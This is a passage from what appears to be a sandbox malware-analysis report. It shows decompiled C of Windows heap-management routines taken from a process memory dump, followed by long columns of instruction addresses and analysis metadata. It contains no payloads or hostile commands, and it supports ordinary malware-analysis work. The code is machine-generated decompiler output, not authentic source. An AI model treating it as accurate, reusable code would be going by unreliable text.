					}
					_t134 = _t159 + (_v16 + 0xfffffffc) * 8;
					_t91 = 0;
					if( *((intOrPtr*)(_t159 + (_v16 + 0xfffffffc) * 8 + 4)) == 0) {
						_t124 = 0;
					} else {
						_t124 = E01321710(_t134);
						_t91 = 0;
					}
					if(_t124 != 0) {
						_t94 = 1 <<  *(_t124 + 0x1c);
						__eflags = 1;
						goto L22;
					} else {
						 *0x13eb1e0( *_t159, _v20, _t91, _a4);
						_t124 =  *( *(_t159 + 4) ^  *0x13e6110 ^ _t159)();
						if(_t124 != 0) {
							_t94 = 0;
							_t160 = 0;
							L22:
							__eflags =  *0x13e610c & 0x00000002;
							_v16 = _t94;
							if(( *0x13e610c & 0x00000002) == 0) {
								L25:
								_t95 = E013BD597(_v20, _v28);
								_t156 = _t95;
								_v12 = _t95;
								L26:
								_t96 = _v16;
								__eflags = _t96;
								if(_t96 != 0) {
									__eflags =  *((char*)(_t124 + 0x1d)) - 1;
									if( *((char*)(_t124 + 0x1d)) > 1) {
										_t169 = _t96 >> 0xc;
										__eflags = _t169;
										_t160 =  ~_t169;
										_v24 = _t160;
									}
								}
								__eflags = _t96 - _t156;
								if(_t96 >= _t156) {
									L33:
									_t137 = _v20;
									__eflags = _t156 - _t137;
									if(_t156 != _t137) {
										_t160 = _t160 + (_t156 >> 0xc);
										__eflags = _t160;
									}
									__eflags = _t160;
									if(_t160 != 0) {
										asm("lock xadd [eax], esi");
									}
									_push(_t137);
									_t156 = _t137;
									E013BDEF6(_t124, _t137, _t137, _v28);
									asm("lock inc dword [eax+0x20]");
									asm("lock xadd [eax], ecx");
									_t161 = _t124;
									_t124 = 0;
									__eflags = 0;
									goto L38;
								} else {
									 *0x13eb1e0( *_t159, _t124, _t156);
									_t110 =  *( *(_t159 + 0xc) ^  *0x13e6110 ^ _t159)();
									__eflags = _t110;
									if(_t110 >= 0) {
										_t160 = _v24;
										_t156 = _v12;
										goto L33;
									}
									_t161 = 0;
									L38:
									_v12 = _t161;
									__eflags = _t124;
									if(_t124 != 0) {
										_t164 =  *(_t159 + 8) ^  *0x13e6110 ^ _t159;
										__eflags = _t164;
										 *0x13eb1e0( *_t159, _t124, _v20, _a4);
										 *_t164();
										_t161 = _v12;
									}
									L40:
									if(_v32 == 0) {
										E0131FA00(_t124, _t159 + 0x34, _t159, _t159 + 0x34);
									}
									return E0133B640(_t161, _t124, _v8 ^ _t173, _t156, _t159, _t161);
								}
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L25;
							}
							_t156 = _v20;
							_v12 = _t156;
							goto L26;
						}
						_t161 = 0;
						goto L40;
					}
				}
				_t146 = _v36;
				if(_v32 > _v36 >> 6) {
					goto L11;
				}
				_t118 = E013BA359(_t146,  *((intOrPtr*)(_t159 + 0x2c)));
				_t147 = _t118;
				_v16 = _t118;
				if(_t147 <= 0xc) {
					_t147 = 0xc;
					_v16 = _t147;
				}
				_t88 = 1;
				_t156 = 1 << _t147;
				if(_t123 > 1) {
					_v20 = 1;
				}
				goto L12;
			}






































                                          0x013bd625
                                          0x013bd629
                                          0x013bd62d
                                          0x013bd62f
                                          0x013bd632
                                          0x013bd638
                                          0x013bd63f
                                          0x013bd641
                                          0x013bd64c
                                          0x013bd64f
                                          0x013bd660
                                          0x013bd651
                                          0x013bd659
                                          0x013bd659
                                          0x013bd667
                                          0x013bd66e
                                          0x013bd67c
                                          0x013bd69a
                                          0x013bd6a0
                                          0x013bd6a5
                                          0x013bd6a7
                                          0x013bd6ad
                                          0x013bd6b1
                                          0x013bd6b2
                                          0x013bd6b2
                                          0x013bd6b8
                                          0x013bd6c1
                                          0x013bd6c4
                                          0x013bd6fb
                                          0x013bd6fd
                                          0x013bd6fd
                                          0x013bd6fe
                                          0x013bd701
                                          0x013bd703
                                          0x013bd706
                                          0x013bd70c
                                          0x013bd70c
                                          0x013bd717
                                          0x013bd71a
                                          0x013bd720
                                          0x013bd72d
                                          0x013bd722
                                          0x013bd727
                                          0x013bd729
                                          0x013bd729
                                          0x013bd731
                                          0x013bd76a
                                          0x013bd76a
                                          0x00000000
                                          0x013bd733
                                          0x013bd749
                                          0x013bd751
                                          0x013bd755
                                          0x013bd75e
                                          0x013bd760
                                          0x013bd76c
                                          0x013bd76c
                                          0x013bd773
                                          0x013bd776
                                          0x013bd786
                                          0x013bd78c
                                          0x013bd791
                                          0x013bd793
                                          0x013bd796
                                          0x013bd796
                                          0x013bd799
                                          0x013bd79b
                                          0x013bd79d
                                          0x013bd7a1
                                          0x013bd7a5
                                          0x013bd7a5
                                          0x013bd7a8
                                          0x013bd7aa
                                          0x013bd7aa
                                          0x013bd7a1
                                          0x013bd7ad
                                          0x013bd7af
                                          0x013bd7d8
                                          0x013bd7d8
                                          0x013bd7db
                                          0x013bd7dd
                                          0x013bd7e4
                                          0x013bd7e4
                                          0x013bd7e4
                                          0x013bd7e6
                                          0x013bd7e8
                                          0x013bd7f0
                                          0x013bd7f0
                                          0x013bd7f4
                                          0x013bd7f9
                                          0x013bd7fd
                                          0x013bd805
                                          0x013bd810
                                          0x013bd814
                                          0x013bd816
                                          0x013bd816
                                          0x00000000
                                          0x013bd7b1
                                          0x013bd7c2
                                          0x013bd7c8
                                          0x013bd7ca
                                          0x013bd7cc
                                          0x013bd7d2
                                          0x013bd7d5
                                          0x00000000
                                          0x013bd7d5
                                          0x013bd7ce
                                          0x013bd818
                                          0x013bd818
                                          0x013bd81b
                                          0x013bd81d
                                          0x013bd831
                                          0x013bd831
                                          0x013bd835
                                          0x013bd83b
                                          0x013bd83d
                                          0x013bd83d
                                          0x013bd840
                                          0x013bd844
                                          0x013bd84a
                                          0x013bd84a
                                          0x013bd861
                                          0x013bd861
                                          0x013bd7af
                                          0x013bd778
                                          0x013bd77c
                                          0x00000000
                                          0x00000000
                                          0x013bd77e
                                          0x013bd781
                                          0x00000000
                                          0x013bd781
                                          0x013bd757
                                          0x00000000
                                          0x013bd757
                                          0x013bd731
                                          0x013bd6c6
                                          0x013bd6d1
                                          0x00000000
                                          0x00000000
                                          0x013bd6d6
                                          0x013bd6db
                                          0x013bd6dd
                                          0x013bd6e3
                                          0x013bd6e7
                                          0x013bd6e8
                                          0x013bd6e8
                                          0x013bd6ed
                                          0x013bd6f0
                                          0x013bd6f4
                                          0x013bd6f6
                                          0x013bd6f6
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 2cc7332feaab6cb2ede34545bdca6590bd9078cb77dc007e6b5d95cc3a5b55b8
                                          • Instruction ID: e15544cc72dab697ad090dd9b027f94841b792dfadd24c50011f958f918a7587
                                          • Opcode Fuzzy Hash: 2cc7332feaab6cb2ede34545bdca6590bd9078cb77dc007e6b5d95cc3a5b55b8
                                          • Instruction Fuzzy Hash: 7881A271E0025A9BCB15DFA9C8816EEBBF5FF48318F148169D615EBA81EB30D911CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013199BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E013199BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E013AFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E013BA80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0134D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E012FB150();
										} else {
											E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E012FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x13e6378 = 1;
											asm("int3");
											 *0x13e6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E0131A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E0131A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E0131BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E013BA80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E0131A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E0131A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0134D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E012FB150();
								} else {
									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E012FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x13e6378 = 1;
									asm("int3");
									 *0x13e6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E013AFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E013BA80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0134D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E012FB150();
													} else {
														E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E012FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x13e6378 = 1;
														asm("int3");
														 *0x13e6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E0131A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E0131A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E0131BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E013BA80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0134D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E012FB150();
													} else {
														E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E012FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x13e6378 = 1;
														asm("int3");
														 *0x13e6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E0131A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E0131A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E0131BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E0131BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                          0x013199ca
                                          0x013199cc
                                          0x013199df
                                          0x013199e3
                                          0x013199f8
                                          0x013199fb
                                          0x013199fb
                                          0x00000000
                                          0x01319a48
                                          0x01319a48
                                          0x01319a4c
                                          0x01319a51
                                          0x01319a55
                                          0x01319a61
                                          0x01319a66
                                          0x01319a68
                                          0x01361457
                                          0x0136145c
                                          0x0136145c
                                          0x01319a68
                                          0x01319a6e
                                          0x01319a71
                                          0x01319a74
                                          0x01319a76
                                          0x01361466
                                          0x01361469
                                          0x01361469
                                          0x0136146c
                                          0x0136146e
                                          0x01361471
                                          0x01361474
                                          0x01361477
                                          0x01361479
                                          0x0136159c
                                          0x0136159c
                                          0x0136159d
                                          0x013615a6
                                          0x013615ab
                                          0x013615ab
                                          0x00000000
                                          0x013615ab
                                          0x0136147f
                                          0x01361481
                                          0x00000000
                                          0x00000000
                                          0x0136148a
                                          0x0136148d
                                          0x01361493
                                          0x01361495
                                          0x013614c0
                                          0x013614c0
                                          0x013614c3
                                          0x013614c6
                                          0x013614c8
                                          0x013614cb
                                          0x013614cf
                                          0x013614f2
                                          0x013614f2
                                          0x013614f5
                                          0x013614f8
                                          0x01361501
                                          0x01361508
                                          0x0136150b
                                          0x0136150e
                                          0x01361510
                                          0x01361513
                                          0x01361515
                                          0x01361515
                                          0x01361518
                                          0x01361518
                                          0x01361513
                                          0x01361521
                                          0x01361525
                                          0x0136152a
                                          0x0136152d
                                          0x01361530
                                          0x01361532
                                          0x01361539
                                          0x0136153d
                                          0x0136155d
                                          0x01361562
                                          0x0136153f
                                          0x01361555
                                          0x0136155a
                                          0x01361570
                                          0x01361577
                                          0x0136157c
                                          0x01361582
                                          0x01361585
                                          0x01361589
                                          0x0136158b
                                          0x01361592
                                          0x01361593
                                          0x01361593
                                          0x01361589
                                          0x01361530
                                          0x00000000
                                          0x013614f8
                                          0x013614d5
                                          0x013614da
                                          0x013614dc
                                          0x00000000
                                          0x013614de
                                          0x013614e8
                                          0x00000000
                                          0x013614e8
                                          0x01361497
                                          0x01361497
                                          0x013614a4
                                          0x013614a4
                                          0x013614a7
                                          0x013614a9
                                          0x013614ab
                                          0x013614ab
                                          0x0136149c
                                          0x0136149e
                                          0x013614a0
                                          0x013614b0
                                          0x013614b0
                                          0x00000000
                                          0x013614a2
                                          0x013614a2
                                          0x00000000
                                          0x013614a2
                                          0x013614a0
                                          0x013614b3
                                          0x013614bb
                                          0x00000000
                                          0x013614bb
                                          0x01361495
                                          0x01319a7c
                                          0x01319a7c
                                          0x01319a7f
                                          0x01319a7f
                                          0x01319a82
                                          0x01319a84
                                          0x01319a87
                                          0x01319a8a
                                          0x01319a8d
                                          0x01319a8f
                                          0x0136166a
                                          0x0136166a
                                          0x0136166b
                                          0x01361674
                                          0x00000000
                                          0x01361674
                                          0x01319a95
                                          0x01319a97
                                          0x00000000
                                          0x00000000
                                          0x01319aa0
                                          0x01319aa3
                                          0x01319aa9
                                          0x01319aab
                                          0x01319ad7
                                          0x01319ad7
                                          0x01319ada
                                          0x01319add
                                          0x01319adf
                                          0x01319ae2
                                          0x01319ae6
                                          0x01319b22
                                          0x01319b27
                                          0x01319b29
                                          0x00000000
                                          0x01319b2b
                                          0x013615be
                                          0x00000000
                                          0x013615be
                                          0x01319b29
                                          0x01319ae8
                                          0x01319ae8
                                          0x01319aeb
                                          0x01319aee
                                          0x013615cb
                                          0x013615d2
                                          0x013615d5
                                          0x013615d7
                                          0x013615da
                                          0x013615dc
                                          0x013615dc
                                          0x013615dc
                                          0x013615da
                                          0x013615e5
                                          0x013615e9
                                          0x013615ee
                                          0x013615f1
                                          0x013615f3
                                          0x013615f9
                                          0x01361600
                                          0x01361604
                                          0x01361624
                                          0x01361629
                                          0x01361606
                                          0x0136161c
                                          0x01361621
                                          0x01361637
                                          0x0136163e
                                          0x01361643
                                          0x01361649
                                          0x0136164c
                                          0x01361650
                                          0x01361656
                                          0x0136165d
                                          0x0136165e
                                          0x0136165e
                                          0x01361650
                                          0x013615f3
                                          0x01319af4
                                          0x01319af7
                                          0x01319afc
                                          0x01319b00
                                          0x01319b04
                                          0x01319b08
                                          0x01319b14
                                          0x013199fe
                                          0x01319a04
                                          0x01319a07
                                          0x00000000
                                          0x01319a29
                                          0x0136169c
                                          0x013616a0
                                          0x013616a5
                                          0x013616a9
                                          0x013616b5
                                          0x013616ba
                                          0x013616bc
                                          0x013616be
                                          0x013616c3
                                          0x013616c3
                                          0x013616bc
                                          0x013616c8
                                          0x013616cc
                                          0x0136181b
                                          0x0136181b
                                          0x0136181e
                                          0x0136181e
                                          0x01361821
                                          0x01361823
                                          0x01361826
                                          0x01361829
                                          0x0136182c
                                          0x0136182e
                                          0x01361688
                                          0x01361688
                                          0x01361689
                                          0x0136168b
                                          0x0136168c
                                          0x0136168d
                                          0x0136168f
                                          0x01361692
                                          0x00000000
                                          0x01361692
                                          0x01361834
                                          0x01361836
                                          0x00000000
                                          0x00000000
                                          0x0136183f
                                          0x01361842
                                          0x01361848
                                          0x0136184a
                                          0x01361875
                                          0x01361875
                                          0x01361878
                                          0x0136187b
                                          0x0136187d
                                          0x01361880
                                          0x01361884
                                          0x013618a7
                                          0x013618a7
                                          0x013618aa
                                          0x013618ad
                                          0x013618b6
                                          0x013618bd
                                          0x013618c0
                                          0x013618c3
                                          0x013618c5
                                          0x013618c8
                                          0x013618ca
                                          0x013618ca
                                          0x013618cd
                                          0x013618cd
                                          0x013618c8
                                          0x013618d5
                                          0x013618da
                                          0x013618df
                                          0x013618e2
                                          0x013618e5
                                          0x013618e7
                                          0x013618ee
                                          0x013618f2
                                          0x01361912
                                          0x01361917
                                          0x013618f4
                                          0x0136190a
                                          0x0136190f
                                          0x01361925
                                          0x0136192c
                                          0x01361931
                                          0x0136193a
                                          0x0136193e
                                          0x01361940
                                          0x01361947
                                          0x01361948
                                          0x01361948
